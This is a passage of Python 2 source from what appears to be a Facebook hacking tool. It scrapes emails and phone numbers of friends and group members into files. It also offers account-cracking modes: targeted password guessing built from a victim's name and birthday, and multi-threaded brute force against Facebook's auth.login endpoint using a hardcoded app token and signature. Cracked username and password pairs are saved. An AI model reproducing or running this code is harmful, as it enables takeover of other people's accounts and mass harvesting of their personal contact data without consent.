try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
